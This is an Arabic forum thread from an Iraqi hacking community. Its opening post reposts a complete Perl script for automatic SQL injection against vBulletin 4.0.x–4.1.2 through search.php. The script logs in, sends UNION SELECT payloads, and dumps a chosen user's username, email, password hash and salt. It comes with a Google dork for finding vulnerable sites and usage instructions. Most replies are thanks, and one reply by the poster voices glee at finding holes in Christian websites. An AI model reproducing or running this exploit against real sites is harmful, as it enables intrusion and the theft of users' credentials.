1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : user01 | المشاهدات : 474 | الردود : 9
حالة الموضوع:
مغلق
  1. user01

    user01 موقوف لمخالفة الشروط

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    212
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    اللغة البرمجية:
    HTML
    YouTube:
    السلام عليكم يا شباب جنت اتصفح موقع ثغرات و لكيت هاي الثغرة


    [SQL]# vBulletin 4.0.x => 4.1.2 AUTOMATIC SQL Injection exploit
    # Author: D35m0nd142, <d35m0nd142@gmail.com>
    # Google Dork: inurl:search.php?search_type=1
    # Date: 02/09/2014
    # Vendor Homepage: vBulletin 5 Connect, The World's Leading Community Software
    # Tested on: vBulletin 4.1.2
    # Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
    # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
    # Vulnerability discovered by: D4rkB1t

    #!/usr/bin/env perl
    use LWP::UserAgent;
    use HTTP::Cookies;

    $ua = LWP::UserAgent->new();
    $ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0");
    $ua->cookie_jar({});
    $username = "username) from user where userid=$ARGV[4]#";
    $email = "email) from user where userid=$ARGV[4]#";
    $password = "password) from user where userid=$ARGV[4]#";
    $salt = "salt) from user where userid=$ARGV[4]#";
    @tofinds = ('database())#'); push(@tofinds,$username); push(@tofinds,$email); push(@tofinds,$password); push(@tofinds,$salt);

    sub request
    {
    $req = HTTP::Request->new(GET => $ARGV[0]);
    my $res1 = $ua->request($req);
    open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
    my $token = dumping("vbloginout.txt","token");
    if($token eq '' || $token eq 'guest')
    {
    print "SECURITYTOKEN not found!\n";
    $token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
    print "Attempting using $token as token.\n";
    }
    else
    {
    print "SECURITYTOKEN FOUND: $token\n";
    }

    print "Sending exploit...\n\n";
    sleep(1);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1');
    $req->content_type('application/x-www-form-urlencoded');

    foreach $tofind (@tofinds)
    {
    $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
    $req->content($post);
    my $res = $ua->request($req);
    open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
    my $location = dumping("vbloc.txt","loc");

    if($location !~ /$ARGV[0]/)
    {
    banner();
    break;
    }

    my $req1 = HTTP::Request->new(GET => $location);
    $req1->content_type('application/x-www-form-urlencoded');
    my $res1 = $ua->request($req1);
    open(FILE,"> vbout.txt");
    print FILE $res1->content;
    close(FILE);
    printout($tofind);
    dumping("vbout.txt","sql");
    print "\n";
    }
    print "\n";
    print "Do you want to run the second exploitation way? (y/n) -> ";
    $want = <STDIN>;
    if($want =~ /y/)
    {
    second_request($token);
    }
    }

    sub second_request
    {
    my ($token) = @_ ;
    print "Attempting using the second exploitation way..\n\n";
    sleep(2);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php');
    $req->content_type('application/x-www-form-urlencoded');

    foreach $tofind (@tofinds)
    {
    $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
    $req->content($post);
    my $res = $ua->request($req);
    open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
    my $location = dumping("vbloc.txt","loc");

    if($location !~ /$ARGV[0]/)
    {
    banner();
    exit(1);
    }

    my $req1 = HTTP::Request->new(GET => $location);
    $req1->content_type('application/x-www-form-urlencoded');
    my $res1 = $ua->request($req1);
    open(FILE,"> vbout.txt");
    print FILE $res1->content;
    close(FILE);
    printout($tofind);
    dumping("vbout.txt","sql");
    print "\n";
    }
    print "\n";
    }

    sub banner
    {
    print "[-] Exploit not successful!\n";
    if(token eq "1409563107-55b86c8f60ad36a41dedff21b06bdc8c9d949303")
    {
    print " Try to log in and log out from other any other sessions and run the exploit again.\n\n";
    }
    }

    sub printout
    {
    my ($tofind) = @_ ;
    if($tofind =~ /username/)
    {
    print "[+] User($ARGV[4]) Username: ";
    }
    elsif($tofind =~ /password/)
    {
    print "[+] User($ARGV[4]) Password: ";
    }
    elsif($tofind =~ /database/)
    {
    print "[+] Database Name: ";
    }
    elsif($tofind =~ /email/)
    {
    print "[+] User($ARGV[4]) Email: ";
    }
    elsif($tofind =~ /salt/)
    {
    print "[+] User($ARGV[4]) Salt: ";
    }
    }

    sub dumping
    {
    my ($filename, $par) = @_ ;
    open(MYFILE,"< ", $filename);
    my @words;
    while(<MYFILE>)
    {
    chomp;
    @words = split(' ');

    if($par eq "token")
    {
    my $ctrl = "n";
    foreach my $word (@words)
    {
    if($word =~ /SECURITYTOKEN/)
    {
    $ctrl = "y";
    }
    if($ctrl eq "y" and $word !~ /=/ and $word !~ /SECURITYTOKEN/)
    {
    $word =~ tr/;//d; $word =~ tr/\"//d;
    return $word;
    break;
    }
    }
    }

    elsif($par eq "sql")
    {
    foreach my $word (@words)
    {
    if($word =~ /:::/)
    {
    $word =~ tr/::://d;
    print "$word";
    }
    }
    }

    else
    {
    my $ctrl2 = "n";
    foreach my $word (@words)
    {
    if($word =~ /Location:/)
    {
    $ctrl2 = "y";
    }
    if($ctrl2 eq "y" and $word !~ /Location:/)
    {
    return $word;
    }
    }
    }
    }
    close(MYFILE);
    }

    sub login(@)
    {
    my $username = shift;
    my $password = shift;
    print "\nLogging in...\n";
    sleep(1);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
    $ua->cookie_jar({});
    my $res = $ua->request($req);
    request();
    }

    if($ARGV[0] eq '' || $ARGV[1] eq '' || $ARGV[2] eq '' || $ARGV[3] eq '' || $ARGV[4] eq '')
    {
    print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n";
    print "Author: D35m0nd142\n\n";
    print "Usage: perl exploit.pl <<http://target> <valid username> <valid passwd> <existent group> <userid to hack>\n";
    print "Example: perl exploit.pl http://site.com myusername mypassword Administrators 1\n\n";
    exit(1);
    }

    print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n";
    print "Author: D35m0nd142\n";
    sleep(1);
    login($ARGV[1],$ARGV[2]);

    @files = ('vbloginout.txt','vbout.txt','vbloc.txt');
    foreach $file (@files)
    {
    unlink $file;
    }[/SQL]
     
  2. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
  3. SiL3nT M4n

    SiL3nT M4n Developer

    الأنتساب:
    ‏19 مايو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    im Syrian
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    الله يعطيك العافيه ياغالي
     
  4. Security-baghdad

    Security-baghdad Developer

    الأنتساب:
    ‏11 أكتوبر 2014
    المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    عشت بارك الله بك
     
  5. Security-baghdad

    Security-baghdad Developer

    الأنتساب:
    ‏11 أكتوبر 2014
    المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    عشت خوي مجهود رائع
     
  6. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,780
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    عاشت الايادي يا غالي
     
  7. user01

    user01 موقوف لمخالفة الشروط

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    212
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    اللغة البرمجية:
    HTML
    YouTube:
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit



    ههههههه حبيبي انت اني افرح لما اشوف ثغرات بمواقع مسيحية لان هذا ايساعدنا حتى انزيد الحماية اكثر و اكثر
     
  8. user01

    user01 موقوف لمخالفة الشروط

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    212
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    اللغة البرمجية:
    HTML
    YouTube:
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    انت العايش حبيبي نورت
     
  9. MJHOOL

    MJHOOL Developer

    الأنتساب:
    ‏6 يونيو 2012
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    الله يعطيك العافية يابطل
     
  10. - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! -

    - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! - موقوف لمخالفة الشروط

    الأنتساب:
    ‏17 أكتوبر 2014
    المشاركات:
    79
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    مبـــــــدع آستمر
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة